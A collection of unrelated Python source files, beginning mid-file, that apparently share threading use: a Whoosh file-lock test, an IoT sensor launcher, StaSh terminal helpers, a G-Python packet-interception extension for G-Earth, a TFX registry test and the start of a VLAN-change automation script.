(False, True, 3), (False, True, 4), (False, True, 5),
(True, False, 0), (True, True, 1), (True, True, 2),
(True, True, 3), (True, True, 4), (True, True, 5))
# run every parameter variant on defined amount of threads
for parameter in parameters:
for x in range(threads_each):
# name the thread by parameters, for easy sorting in supervisor thread
name = "h-"+str(parameter[0])+"-"+str(parameter[1])+"-"+str(parameter[2])
thread = Process(target=hunt_child, args=(name, q, samples, parameter))
thread.start()
# also start the random AI threads
for y in range(threads_each):
thread = Process(target=random_child, args=("r", q, samples))
thread.start()
# start the supervisor thread, only need one
thread = Process(target=supervisor, args=("Supervisor", q, samples,
len(parameters)+1*threads_each))
thread.start()
if __name__ == "__main__":
main()
|
test_misc.py
|
import unittest
import os, os.path, threading, time
from whoosh.filedb.filestore import FileStorage
from whoosh.support.filelock import try_for
class TestMisc(unittest.TestCase):
def make_dir(self, name):
if not os.path.exists(name):
os.mkdir(name)
def destroy_dir(self, name):
try:
os.rmdir("testindex")
except:
pass
def clean_file(self, path):
if os.path.exists(path):
try:
os.remove(path)
except:
pass
def test_filelock_simple(self):
self.make_dir("testindex")
st = FileStorage("testindex")
lock1 = st.lock("testlock")
lock2 = st.lock("testlock")
self.assertTrue(lock1.acquire())
self.assertFalse(lock2.acquire())
lock1.release()
self.assertTrue(lock2.acquire())
self.assertFalse(lock1.acquire())
lock2.release()
self.clean_file("testindex/testlock")
self.destroy_dir("testindex")
def test_threaded_filelock(self):
self.make_dir("testindex")
st = FileStorage("testindex")
lock1 = st.lock("testlock")
result = []
# The thread function tries to acquire the lock and
# then quits
def fn():
lock2 = st.lock("testlock")
gotit = try_for(lock2.acquire, 1.0, 0.1)
if gotit:
result.append(True)
lock2.release()
t = threading.Thread(target=fn)
# Acquire the lock in this thread
lock1.acquire()
# Start the other thread trying to acquire the lock
t.start()
# Wait for a bit
time.sleep(0.15)
# Release the lock
lock1.release()
# Wait for the other thread to finish
t.join()
# If the other thread got the lock, it should have
# appended something to the "results" list.
self.assertEqual(len(result), 1)
self.clean_file("testindex/testlock")
self.destroy_dir("testindex")
if __name__ == '__main__':
unittest.main()
|
__main__.py
|
from src.config.config import QUEUE_HUMIDITY_NAME, QUEUE_LIGHT_NAME, QUEUE_TEMPERATURE_NAME
from src.measures.humidity import Humidity
from src.measures.light import Light
from src.measures.temperature import Temperature
from src.queue.queue import Queue
from threading import Thread
controllers = [
Humidity(QUEUE_HUMIDITY_NAME, 60),
Light(QUEUE_LIGHT_NAME, 60),
Temperature(QUEUE_TEMPERATURE_NAME, 60)
]
def main():
print('main')
for controller in controllers:
Thread(target=Queue, args=(controller, )).start()
if __name__ == '__main__':
main()
|
shcommon.py
|
# -*- coding: utf-8 -*-
"""
The Control, Escape and Graphics are taken from pyte (https://github.com/selectel/pyte)
"""
import os
import sys
import platform
import functools
import threading
import ctypes
from itertools import chain
import six
IN_PYTHONISTA = sys.executable.find('Pythonista') >= 0
if IN_PYTHONISTA:
import plistlib
_properties = plistlib.readPlist(os.path.join(os.path.dirname(sys.executable), 'Info.plist'))
PYTHONISTA_VERSION = _properties['CFBundleShortVersionString']
PYTHONISTA_VERSION_LONG = _properties['CFBundleVersion']
if PYTHONISTA_VERSION < '3.0':
python_capi = ctypes.pythonapi
else:
# The default pythonapi always points to Python 3 in Pythonista 3
if six.PY3:
python_capi = ctypes.pythonapi
else:
# We need to load the Python 2 API manually
try:
python_capi = ctypes.PyDLL(
os.path.join(os.path.dirname(sys.executable),
'Frameworks/Py2Kit.framework/Py2Kit'))
except OSError:
python_capi = ctypes.PyDLL(
os.path.join(os.path.dirname(sys.executable),
'Frameworks/PythonistaKit.framework/PythonistaKit'))
else:
PYTHONISTA_VERSION = '0.0'
PYTHONISTA_VERSION_LONG = '000000'
python_capi = ctypes.pythonapi
platform_string = platform.platform()
ON_IPAD = platform_string.find('iPad') >= 0
ON_IOS_8 = platform_string.split('-')[1].startswith('14')
M_64 = platform_string.find('64bit') != -1
CTRL_KEY_FLAG = (1 << 18) # Control key for keyCommands
CMD_KEY_FLAG = (1 << 20) # Command key
_STASH_ROOT = os.path.realpath(os.path.abspath(
os.path.dirname(os.path.dirname(__file__))))
_STASH_CONFIG_FILES = ('.stash_config', 'stash.cfg')
_STASH_HISTORY_FILE = '.stash_history'
# directory for stash extensions
_STASH_EXTENSION_PATH = os.path.abspath(
os.path.join(os.getenv("HOME"), "Library", "stash_extensions"),
)
# directory for stash bin extensions
_STASH_EXTENSION_BIN_PATH = os.path.join(_STASH_EXTENSION_PATH, "bin")
# directory for stash man extensions
_STASH_EXTENSION_MAN_PATH = os.path.join(_STASH_EXTENSION_PATH, "man")
# directory for stash FSI extensions
_STASH_EXTENSION_FSI_PATH = os.path.join(_STASH_EXTENSION_PATH, "fsi")
# directory for stash patch extensions
_STASH_EXTENSION_PATCH_PATH = os.path.join(_STASH_EXTENSION_PATH, "patches")
# list of directories outside of _STASH_ROOT, used for simple mkdir
_EXTERNAL_DIRS = [
_STASH_EXTENSION_PATH,
_STASH_EXTENSION_BIN_PATH,
_STASH_EXTENSION_MAN_PATH,
_STASH_EXTENSION_FSI_PATH,
_STASH_EXTENSION_PATCH_PATH,
]
# Python 3 or not Python 3
PY3 = six.PY3
# Save the true IOs
if IN_PYTHONISTA:
# The stdio catchers recreation is copied from code written by @dgelessus
# https://forum.omz-software.com/topic/1946/pythonista-1-6-beta/167
# In pythonista beta 301006, _outputcapture was replaced with pykit_io
try:
import _outputcapture
except ImportError:
import pykit_io
class _outputcapture(object):
ReadStdin=pykit_io.read_stdin
CaptureStdout=pykit_io.write_stdout
CaptureStderr=pykit_io.write_stderr
if sys.stdin.__class__.__name__ == 'StdinCatcher':
_SYS_STDIN = sys.__stdin__ = sys.stdin
elif sys.__stdin__.__class__.__name__ == 'StdinCatcher':
_SYS_STDIN = sys.__stdin__
else:
class StdinCatcher(object):
def __init__(self):
self.encoding = 'utf8'
def read(self, limit=-1):
return _outputcapture.ReadStdin(limit)
def readline(self):
return _outputcapture.ReadStdin()
_SYS_STDIN = StdinCatcher()
if sys.stdout.__class__.__name__ == 'StdoutCatcher':
_SYS_STDOUT = sys.__stdout__ = sys.stdout
elif sys.__stdout__.__class__.__name__ == 'StdoutCatcher':
_SYS_STDOUT = sys.__stdout__
else:
class StdoutCatcher(object):
def __init__(self):
self.encoding = 'utf8'
def flush(self):
pass
def write(self, s):
if isinstance(s, str):
_outputcapture.CaptureStdout(s)
elif isinstance(s, six.text_type):
_outputcapture.CaptureStdout(s.encode('utf8'))
def writelines(self, lines):
self.write(''.join(lines))
_SYS_STDOUT = StdoutCatcher()
if sys.stderr.__class__.__name__ == 'StderrCatcher':
_SYS_STDERR = sys.__stderr__ = sys.stderr
elif sys.stderr.__class__.__name__ == 'StderrCatcher':
_SYS_STDERR = sys.__stderr__
else:
class StderrCatcher(object):
def __init__(self):
self.encoding = 'utf8'
def flush(self):
pass
def write(self, s):
if isinstance(s, str):
_outputcapture.CaptureStderr(s)
elif isinstance(s, six.text_type):
_outputcapture.CaptureStderr(s.encode('utf8'))
def writelines(self, lines):
self.write(''.join(lines))
_SYS_STDERR = StderrCatcher()
else:
_SYS_STDOUT = sys.stdout
_SYS_STDERR = sys.stderr
_SYS_STDIN = sys.stdin
_SYS_PATH = sys.path
_OS_ENVIRON = os.environ
def is_binary_file(filename, nbytes=1024):
"""
An approximate way to tell whether a file is binary.
:param str filename: The name of the file to be tested.
:param int nbytes: number of bytes to read for test
:return:
"""
with open(filename, 'rb') as ins:
for c in ins.read(nbytes):
if isinstance(c, six.integer_types):
oc = c
else:
oc = ord(c)
if 127 < oc < 256 or (oc < 32 and oc not in (9, 10, 13)):
return True
else:
return False
def sh_delay(func, nseconds):
t = threading.Timer(nseconds, func)
t.start()
return t
def sh_background(name=None):
def wrap(func):
@functools.wraps(func)
def wrapped_func(*args, **kwargs):
t = threading.Thread(name=name, target=func, args=args, kwargs=kwargs)
t.start()
return t
return wrapped_func
return wrap
class ShFileNotFound(Exception):
pass
class ShIsDirectory(Exception):
pass
class ShNotExecutable(Exception):
def __init__(self, filename):
super(Exception, self).__init__('{}: not executable\n'.format(filename))
class ShSingleExpansionRequired(Exception):
pass
class ShEventNotFound(Exception):
pass
class ShBadSubstitution(Exception):
pass
class ShSyntaxError(Exception):
pass
class ShInternalError(Exception):
pass
class Control(object):
"""
pyte.control
~~~~~~~~~~~~
This module defines simple control sequences, recognized by
:class:`~pyte.streams.Stream`, the set of codes here is for
``TERM=linux`` which is a superset of VT102.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
#: *Space*: Not suprisingly -- ``" "``.
SP = u" "
#: *Null*: Does nothing.
NUL = u"\u0000"
#: *Bell*: Beeps.
BEL = u"\u0007"
#: *Backspace*: Backspace one column, but not past the beginning of the
#: line.
BS = u"\u0008"
#: *Horizontal tab*: Move cursor to the next tab stop, or to the end
#: of the line if there is no earlier tab stop.
HT = u"\u0009"
#: *Linefeed*: Give a line feed, and, if :data:`pyte.modes.LNM` (new
#: line mode) is set also a carriage return.
LF = u"\n"
#: *Vertical tab*: Same as :data:`LF`.
VT = u"\u000b"
#: *Form feed*: Same as :data:`LF`.
FF = u"\u000c"
#: *Carriage return*: Move cursor to left margin on current line.
CR = u"\r"
#: *Shift out*: Activate G1 character set.
SO = u"\u000e"
#: *Shift in*: Activate G0 character set.
SI = u"\u000f"
#: *Cancel*: Interrupt escape sequence. If received during an escape or
#: control sequence, cancels the sequence and displays substitution
#: character.
CAN = u"\u0018"
#: *Substitute*: Same as :data:`CAN`.
SUB = u"\u001a"
#: *Escape*: Starts an escape sequence.
ESC = u"\u001b"
#: *Delete*: Is ignored.
DEL = u"\u007f"
#: *Control sequence introducer*: An equivalent for ``ESC [``.
CSI = u"\u009b"
class Escape(object):
"""
pyte.escape
~~~~~~~~~~~
This module defines both CSI and non-CSI escape sequences, recognized
by :class:`~pyte.streams.Stream` and subclasses.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
#: *Reset*.
RIS = u"c"
#: *Index*: Move cursor down one line in same column. If the cursor is
#: at the bottom margin, the screen performs a scroll-up.
IND = u"D"
#: *Next line*: Same as :data:`pyte.control.LF`.
NEL = u"E"
#: Tabulation set: Set a horizontal tab stop at cursor position.
HTS = u"H"
#: *Reverse index*: Move cursor up one line in same column. If the
#: cursor is at the top margin, the screen performs a scroll-down.
RI = u"M"
#: Save cursor: Save cursor position, character attribute (graphic
#: rendition), character set, and origin mode selection (see
#: :data:`DECRC`).
DECSC = u"7"
#: *Restore cursor*: Restore previously saved cursor position, character
#: attribute (graphic rendition), character set, and origin mode
#: selection. If none were saved, move cursor to home position.
DECRC = u"8"
# "Percent" escape sequences.
# ---------------------------
#: *Select default (ISO 646 / ISO 8859-1)*.
DEFAULT = u"@"
#: *Select UTF-8*.
UTF8 = u"G"
#: *Select UTF-8 (obsolete)*.
UTF8_OBSOLETE = u"8"
# "Sharp" escape sequences.
# -------------------------
#: *Alignment display*: Fill screen with uppercase E's for testing
#: screen focus and alignment.
DECALN = u"8"
# ECMA-48 CSI sequences.
# ---------------------
#: *Insert character*: Insert the indicated # of blank characters.
ICH = u"@"
#: *Cursor up*: Move cursor up the indicated # of lines in same column.
#: Cursor stops at top margin.
CUU = u"A"
#: *Cursor down*: Move cursor down the indicated # of lines in same
#: column. Cursor stops at bottom margin.
CUD = u"B"
#: *Cursor forward*: Move cursor right the indicated # of columns.
#: Cursor stops at right margin.
CUF = u"C"
#: *Cursor back*: Move cursor left the indicated # of columns. Cursor
#: stops at left margin.
CUB = u"D"
#: *Cursor next line*: Move cursor down the indicated # of lines to
#: column 1.
CNL = u"E"
#: *Cursor previous line*: Move cursor up the indicated # of lines to
#: column 1.
CPL = u"F"
#: *Cursor horizontal align*: Move cursor to the indicated column in
#: current line.
CHA = u"G"
#: *Cursor position*: Move cursor to the indicated line, column (origin
#: at ``1, 1``).
CUP = u"H"
#: *Erase data* (default: from cursor to end of line).
ED = u"J"
#: *Erase in line* (default: from cursor to end of line).
EL = u"K"
#: *Insert line*: Insert the indicated # of blank lines, starting from
#: the current line. Lines displayed below cursor move down. Lines moved
#: past the bottom margin are lost.
IL = u"L"
#: *Delete line*: Delete the indicated # of lines, starting from the
#: current line. As lines are deleted, lines displayed below cursor
#: move up. Lines added to bottom of screen have spaces with same
#: character attributes as last line move up.
DL = u"M"
#: *Delete character*: Delete the indicated # of characters on the
#: current line. When character is deleted, all characters to the right
#: of cursor move left.
DCH = u"P"
#: *Erase character*: Erase the indicated # of characters on the
#: current line.
ECH = u"X"
#: *Horizontal position relative*: Same as :data:`CUF`.
HPR = u"a"
#: *Vertical position adjust*: Move cursor to the indicated line,
#: current column.
VPA = u"d"
#: *Vertical position relative*: Same as :data:`CUD`.
VPR = u"e"
#: *Horizontal / Vertical position*: Same as :data:`CUP`.
HVP = u"f"
#: *Tabulation clear*: Clears a horizontal tab stop at cursor position.
TBC = u"g"
#: *Set mode*.
SM = u"h"
#: *Reset mode*.
RM = u"l"
#: *Select graphics rendition*: The terminal can display the following
#: character attributes that change the character display without
#: changing the character (see :mod:`pyte.graphics`).
SGR = u"m"
#: *Select top and bottom margins*: Selects margins, defining the
#: scrolling region; parameters are top and bottom line. If called
#: without any arguments, whole screen is used.
DECSTBM = u"r"
#: *Horizontal position adjust*: Same as :data:`CHA`.
HPA = u"'"
class Graphics(object):
# -*- coding: utf-8 -*-
"""
pyte.graphics
~~~~~~~~~~~~~
This module defines graphic-related constants, mostly taken from
:manpage:`console_codes(4)` and
http://pueblo.sourceforge.net/doc/manual/ansi_color_codes.html.
:copyright: (c) 2011-2013 by Selectel, see AUTHORS for details.
:license: LGPL, see LICENSE for more details.
"""
#: A mapping of ANSI text style codes to style names, "+" means the:
#: attribute is set, "-" -- reset; example:
#:
#: >>> text[1]
#: '+bold'
#: >>> text[9]
#: '+strikethrough'
TEXT = {
1: "+bold",
3: "+italics",
4: "+underscore",
7: "+reverse",
9: "+strikethrough",
22: "-bold",
23: "-italics",
24: "-underscore",
27: "-reverse",
29: "-strikethrough"
}
#: A mapping of ANSI foreground color codes to color names, example:
#:
#: >>> FG[30]
#: 'black'
#: >>> FG[38]
#: 'default'
FG = {
30: "black",
31: "red",
32: "green",
33: "brown",
34: "blue",
35: "magenta",
36: "cyan",
37: "white",
39: "default", # white.
50: "gray",
51: "yellow",
52: "smoke",
}
#: A mapping of ANSI background color codes to color names, example:
#:
#: >>> BG[40]
#: 'black'
#: >>> BG[48]
#: 'default'
BG = {
40: "black",
41: "red",
42: "green",
43: "brown",
44: "blue",
45: "magenta",
46: "cyan",
47: "white",
49: "default", # black.
60: "gray",
61: "yellow",
62: "smoke",
}
# Reverse mapping of all available attributes -- keep this private!
_SGR = {v: k for k, v in chain(FG.items(),
TEXT.items())}
_SGR.update({'bg-' + v: k for k, v in BG.items()})
|
gextension.py
|
import socket
import sys
import threading
from enum import Enum
from .hpacket import HPacket
from .hmessage import HMessage, Direction
import json
MINIMUM_GEARTH_VERSION = "1.4.1"
class INCOMING_MESSAGES(Enum):
ON_DOUBLE_CLICK = 1
INFO_REQUEST = 2
PACKET_INTERCEPT = 3
FLAGS_CHECK = 4
CONNECTION_START = 5
CONNECTION_END = 6
PACKET_TO_STRING_RESPONSE = 20
STRING_TO_PACKET_RESPONSE = 21
INIT = 7
class OUTGOING_MESSAGES(Enum):
EXTENSION_INFO = 1
MANIPULATED_PACKET = 2
REQUEST_FLAGS = 3
SEND_MESSAGE = 4
PACKET_TO_STRING_REQUEST = 20
STRING_TO_PACKET_REQUEST = 21
EXTENSION_CONSOLE_LOG = 98
EXTENSION_SETTINGS_DEFAULT = {"use_click_trigger": False, "can_leave": True, "can_delete": True}
EXTENSION_INFO_REQUIRED_FIELDS = ["title", "description", "version", "author"]
PORT_FLAG = ["--port", "-p"]
FILE_FLAG = ["--filename", "-f"]
COOKIE_FLAG = ["--auth-token", "-c"]
def fill_settings(settings, defaults):
if settings is None:
return defaults.copy()
settings = settings.copy()
for key, value in defaults.items():
if key not in settings or settings[key] is None:
settings[key] = value
return settings
def get_argument(args, flags):
if type(flags) == str:
flags = [flags]
for potential_flag in flags:
if potential_flag in args:
index = args.index(potential_flag)
if 0 <= index < len(args) - 1:
return args[index + 1]
return None
class Extension:
def __init__(self, extension_info, args, extension_settings=None, silent=False):
if not silent:
print("WARNING: This version of G-Python requires G-Earth >= {}".format(MINIMUM_GEARTH_VERSION), file=sys.stderr)
extension_settings = fill_settings(extension_settings, EXTENSION_SETTINGS_DEFAULT)
if get_argument(args, PORT_FLAG) is None:
raise Exception('Port was not specified (argument example: -p 9092)')
for key in EXTENSION_INFO_REQUIRED_FIELDS:
if key not in extension_info:
raise Exception('Extension info error: {} field missing'.format(key))
port = int(get_argument(args, PORT_FLAG))
file = get_argument(args, FILE_FLAG)
cookie = get_argument(args, COOKIE_FLAG)
self.__sock = None
self.__lost_packets = 0
self._extension_info = extension_info
self.__port = port
self.__file = file
self.__cookie = cookie
self._extension_settings = extension_settings
self.connection_info = None
self.packet_infos = None
self.__start_barrier = threading.Barrier(2)
self.__start_lock = threading.Lock()
self.__stream_lock = threading.Lock()
self.__events = {}
self.__intercept_listeners = {Direction.TO_CLIENT: {-1: []}, Direction.TO_SERVER: {-1: []}}
self.__request_lock = threading.Lock()
self.__response_barrier = threading.Barrier(2)
self.__response = None
self.__manipulation_lock = threading.Lock()
self.__manipulation_event = threading.Event()
self.__manipulate_messages = []
def __read_gearth_packet(self):
write_pos = 0
length_buffer = bytearray(4)
while write_pos < 4:
n_read = self.__sock.recv_into(memoryview(length_buffer)[write_pos:])
if n_read == 0:
raise EOFError
write_pos += n_read
packet_length = int.from_bytes(length_buffer, byteorder='big')
packet_buffer = length_buffer + bytearray(packet_length)
while write_pos < 4 + packet_length:
n_read = self.__sock.recv_into(memoryview(packet_buffer)[write_pos:])
if n_read == 0:
raise EOFError
write_pos += n_read
return HPacket.from_bytes(packet_buffer)
def __packet_manipulation_thread(self):
while not self.is_closed():
habbo_message = None
while habbo_message is None and not self.is_closed():
if len(self.__manipulate_messages) > 0:
self.__manipulation_lock.acquire()
habbo_message = self.__manipulate_messages.pop(0)
self.__manipulation_lock.release()
self.__manipulation_event.clear()
else:
self.__manipulation_event.wait(0.002)
self.__manipulation_event.clear()
if self.is_closed():
return
habbo_packet = habbo_message.packet
habbo_packet.default_extension = self
for func in self.__intercept_listeners[habbo_message.direction][-1]:
func(habbo_message)
habbo_packet.reset()
header_id = habbo_packet.header_id()
potential_intercept_ids = {header_id}
if self.packet_infos is not None and header_id in self.packet_infos[habbo_message.direction]:
for elem in self.packet_infos[habbo_message.direction][header_id]:
if elem['Name'] is not None:
potential_intercept_ids.add(elem['Name'])
if elem['Hash'] is not None:
potential_intercept_ids.add(elem['Hash'])
for id in potential_intercept_ids:
if id in self.__intercept_listeners[habbo_message.direction]:
for func in self.__intercept_listeners[habbo_message.direction][id]:
func(habbo_message)
habbo_packet.reset()
response_packet = HPacket(OUTGOING_MESSAGES.MANIPULATED_PACKET.value)
response_packet.append_string(repr(habbo_message), head=4, encoding='iso-8859-1')
self.__send_to_stream(response_packet)
def __connection_thread(self):
t = threading.Thread(target=self.__packet_manipulation_thread)
t.start()
while not self.is_closed():
try:
packet = self.__read_gearth_packet()
except:
if not self.is_closed():
self.stop()
return
message_type = INCOMING_MESSAGES(packet.header_id())
if message_type == INCOMING_MESSAGES.INFO_REQUEST:
response = HPacket(OUTGOING_MESSAGES.EXTENSION_INFO.value)
response \
.append_string(self._extension_info['title']) \
.append_string(self._extension_info['author']) \
.append_string(self._extension_info['version']) \
.append_string(self._extension_info['description']) \
.append_bool(self._extension_settings['use_click_trigger']) \
.append_bool(self.__file is not None) \
.append_string('' if self.__file is None else self.__file) \
.append_string('' if self.__cookie is None else self.__cookie) \
.append_bool(self._extension_settings['can_leave']) \
.append_bool(self._extension_settings['can_delete'])
self.__send_to_stream(response)
elif message_type == INCOMING_MESSAGES.CONNECTION_START:
host, port, hotel_version, client_identifier, client_type = packet.read("sisss")
self.__parse_packet_infos(packet)
self.connection_info = {'host': host, 'port': port, 'hotel_version': hotel_version,
'client_identifier': client_identifier, 'client_type': client_type}
self.__raise_event('connection_start')
if self.__await_connect_packet:
self.__await_connect_packet = False
self.__start_barrier.wait()
elif message_type == INCOMING_MESSAGES.CONNECTION_END:
self.__raise_event('connection_end')
self.connection_info = None
self.packet_infos = None
elif message_type == INCOMING_MESSAGES.FLAGS_CHECK:
size = packet.read_int()
flags = [packet.read_string() for _ in range(size)]
self.__response = flags
self.__response_barrier.wait()
elif message_type == INCOMING_MESSAGES.INIT:
self.__raise_event('init')
self.write_to_console(
'g_python extension "{}" sucessfully initialized'.format(self._extension_info['title']),
'green',
False
)
self.__await_connect_packet = packet.read_bool()
if not self.__await_connect_packet:
self.__start_barrier.wait()
elif message_type == INCOMING_MESSAGES.ON_DOUBLE_CLICK:
self.__raise_event('double_click')
elif message_type == INCOMING_MESSAGES.PACKET_INTERCEPT:
habbo_msg_as_string = packet.read_string(head=4, encoding='iso-8859-1')
habbo_message = HMessage.reconstruct_from_java(habbo_msg_as_string)
self.__manipulation_lock.acquire()
self.__manipulate_messages.append(habbo_message)
self.__manipulation_lock.release()
self.__manipulation_event.set()
elif message_type == INCOMING_MESSAGES.PACKET_TO_STRING_RESPONSE:
string = packet.read_string(head=4, encoding='iso-8859-1')
expression = packet.read_string(head=4, encoding='utf-8')
self.__response = (string, expression)
self.__response_barrier.wait()
elif message_type == INCOMING_MESSAGES.STRING_TO_PACKET_RESPONSE:
packet_string = packet.read_string(head=4, encoding='iso-8859-1')
self.__response = HPacket.reconstruct_from_java(packet_string)
self.__response_barrier.wait()
def __parse_packet_infos(self, packet : HPacket):
incoming = {}
outgoing = {}
length = packet.read_int()
for _ in range(length):
headerId, hash, name, structure, isOutgoing, source = packet.read('isssBs')
name = name if name is not 'NULL' else None
hash = hash if hash is not 'NULL' else None
structure = structure if structure is not 'NULL' else None
elem = {'Id': headerId, 'Name': name, 'Hash': hash, 'Structure': structure, 'Source': source}
packet_dict = outgoing if isOutgoing else incoming
if headerId not in packet_dict:
packet_dict[headerId] = []
packet_dict[headerId].append(elem)
if hash is not None:
if hash not in packet_dict:
packet_dict[hash] = []
packet_dict[hash].append(elem)
if name is not None:
if name not in packet_dict:
packet_dict[name] = []
packet_dict[name].append(elem)
self.packet_infos = {Direction.TO_CLIENT: incoming, Direction.TO_SERVER: outgoing}
def __send_to_stream(self, packet):
self.__stream_lock.acquire()
self.__sock.send(packet.bytearray)
self.__stream_lock.release()
def __callbacks(self, callbacks):
for func in callbacks:
func()
def __raise_event(self, event_name):
if event_name in self.__events:
t = threading.Thread(target=self.__callbacks, args=(self.__events[event_name],))
t.start()
def __send(self, direction, packet: HPacket):
if not self.is_closed():
old_settings = None
if packet.is_incomplete_packet():
old_settings = (packet.header_id(), packet.is_edited, packet.incomplete_identifier)
packet.fill_id(direction, self)
if self.connection_info == None:
self.__lost_packets += 1
print("Could not send packet because G-Earth isn't connected to a client", file=sys.stderr)
return False
if packet.is_corrupted():
self.__lost_packets += 1
print('Could not send corrupted', file=sys.stderr)
return False
if packet.is_incomplete_packet():
self.__lost_packets += 1
print('Could not send incomplete packet', file=sys.stderr)
return False
wrapper_packet = HPacket(OUTGOING_MESSAGES.SEND_MESSAGE.value, direction == Direction.TO_SERVER,
len(packet.bytearray), bytes(packet.bytearray))
self.__send_to_stream(wrapper_packet)
if old_settings is not None:
packet.replace_short(4, old_settings[0])
packet.incomplete_identifier = old_settings[2]
packet.is_edited = old_settings[1]
return True
else:
self.__lost_packets += 1
return False
def is_closed(self):
"""
:return: true if no extension isn't connected with G-Earth
"""
return self.__sock is None or self.__sock.fileno() == -1
def send_to_client(self, packet):
"""
Sends a message to the client
:param packet: a HPacket() or a string representation
"""
if type(packet) is str:
packet = self.string_to_packet(packet)
self.__send(Direction.TO_CLIENT, packet)
def send_to_server(self, packet):
"""
Sends a message to the server
:param packet: a HPacket() or a string representation
"""
if type(packet) is str:
packet = self.string_to_packet(packet)
self.__send(Direction.TO_SERVER, packet)
def on_event(self, event_name: str, func):
"""
implemented event names: double_click, connection_start, connection_end,init. When this
even occurs, a callback is being done to "func"
"""
if event_name in self.__events:
self.__events[event_name].append(func)
else:
self.__events[event_name] = [func]
def intercept(self, direction: Direction, callback, id=-1, mode='default'):
"""
:param direction: Direction.TOCLIENT or Direction.TOSERVER
:param callback: function that takes HMessage as an argument
:param id: header_id / hash / name
:param mode: can be: * default (blocking)
* async (async, can't modify packet, doesn't disturb packet flow)
* async_modify (async, can modify, doesn't block other packets, disturbs packet flow)
:return:
"""
original_callback = callback
if mode == 'async':
def new_callback(hmessage : HMessage):
copy = HMessage(hmessage.packet, hmessage.direction, hmessage._index, hmessage.is_blocked)
t = threading.Thread(target=original_callback, args=[copy])
t.start()
callback = new_callback
if mode == 'async_modify':
def callback_send(hmessage : HMessage):
original_callback(hmessage)
if not hmessage.is_blocked:
self.__send(hmessage.direction, hmessage.packet)
def new_callback(hmessage : HMessage):
hmessage.is_blocked = True
copy = HMessage(hmessage.packet, hmessage.direction, hmessage._index, False)
t = threading.Thread(target=callback_send, args=[copy])
t.start()
callback = new_callback
if id not in self.__intercept_listeners[direction]:
self.__intercept_listeners[direction][id] = []
self.__intercept_listeners[direction][id].append(callback)
def start(self):
"""
Tries to set up a connection with G-Earth
"""
self.__start_lock.acquire()
if self.is_closed():
self.__sock = socket.socket()
self.__sock.connect(("127.0.0.1", self.__port))
self.__sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
t = threading.Thread(target=self.__connection_thread)
t.start()
self.__start_barrier.wait()
else:
self.__start_lock.release()
raise Exception("Attempted to run already-running extension")
self.__start_lock.release()
def stop(self):
"""
Aborts an existing connection with G-Earth
"""
if not self.is_closed():
self.__sock.close()
else:
raise Exception("Attempted to close extension that wasn't running")
def write_to_console(self, text, color='black', mention_title=True):
"""
Writes a message to the G-Earth console
"""
message = '[{}]{}{}'.format(color, (self._extension_info['title'] + ' --> ') if mention_title else '', text)
packet = HPacket(OUTGOING_MESSAGES.EXTENSION_CONSOLE_LOG.value, message)
self.__send_to_stream(packet)
def __await_response(self, request):
self.__request_lock.acquire()
self.__send_to_stream(request)
self.__response_barrier.wait()
result = self.__response
self.__response = None
self.__request_lock.release()
return result
def packet_to_string(self, packet: HPacket):
request = HPacket(OUTGOING_MESSAGES.PACKET_TO_STRING_REQUEST.value)
request.append_string(repr(packet), 4, 'iso-8859-1')
return self.__await_response(request)[0]
def packet_to_expression(self, packet: HPacket):
request = HPacket(OUTGOING_MESSAGES.PACKET_TO_STRING_REQUEST.value)
request.append_string(repr(packet), 4, 'iso-8859-1')
return self.__await_response(request)[1]
def string_to_packet(self, string):
request = HPacket(OUTGOING_MESSAGES.STRING_TO_PACKET_REQUEST.value)
request.append_string(string, 4)
return self.__await_response(request)
def request_flags(self):
return self.__await_response(HPacket(OUTGOING_MESSAGES.REQUEST_FLAGS.value))
|
node_registry_test.py
|
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.dsl.components.base.node_registry."""
import threading
from typing import Any, Dict, Text
import tensorflow as tf
from tfx.dsl.components.base import base_node
from tfx.dsl.components.base import node_registry
class _FakeNode(base_node.BaseNode):
@property
def inputs(self) -> Dict[Text, Any]:
return {}
@property
def outputs(self) -> Dict[Text, Any]:
return {}
@property
def exec_properties(self) -> Dict[str, Any]:
return {}
class NodeRegistryTest(tf.test.TestCase):
def testNodeRegistrySingleThread(self):
thread_name = threading.current_thread().name
self.assertSetEqual(node_registry.registered_nodes(), set())
unused_node1 = _FakeNode().with_id(f'node1_{thread_name}')
registered_node_names = {
node.id for node in node_registry.registered_nodes()
}
self.assertSetEqual(registered_node_names, {f'node1_{thread_name}'})
unused_node2 = _FakeNode().with_id(f'node2_{thread_name}')
registered_node_names = {
node.id for node in node_registry.registered_nodes()
}
self.assertSetEqual(registered_node_names,
{f'node1_{thread_name}', f'node2_{thread_name}'})
def testNodeRegistryMultiThread(self):
threads = [
threading.Thread(target=self.testNodeRegistrySingleThread)
for i in range(10)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
tf.test.main()
|
VLAN Changer Git.py
|
#!/usr/bin/python3.6
from __future__ import print_function
from googleapiclient.discovery import build
from googleapiclient import errors
from httplib2 import Http
from oauth2client import file, client, tools
from pytz import timezone
from datetime import datetime
from re import match
from netmiko import ConnectHandler, ssh_exception
from email.mime.text import MIMEText
import base64
import time
import threading
import queue
# If modifying these scopes, delete the file token.json.
SCOPES_SHEETS = 'https://www.googleapis.com/auth/spreadsheets'
SCOPES_GMAIL = 'https://www.googleapis.com/auth/gmail.send'
# The ID and range of the VLAN Change Request Form results spreadsheet.
SPREADSHEET_ID = 'yourSheetID'
RANGE_NAME = 'A2:I'
# List of people to receive notifications for failed attempts
EMAILS = ['netadminsemails@gmail.com']
# Maximum number of connections allowed at one time
MAX_THREADS = 5
# Job queue for new submissions (not a constant)
q = queue.Queue()
# Sleep time in seconds
seconds = 10
# TODO: Edit with appropriate VLAN IDs
VLAN_DICT = {
'Management': 1,
'Food Services': 2,
'UPS': 3,
'Copiers': 4,
'Printers': 5,
'Cameras': 6,
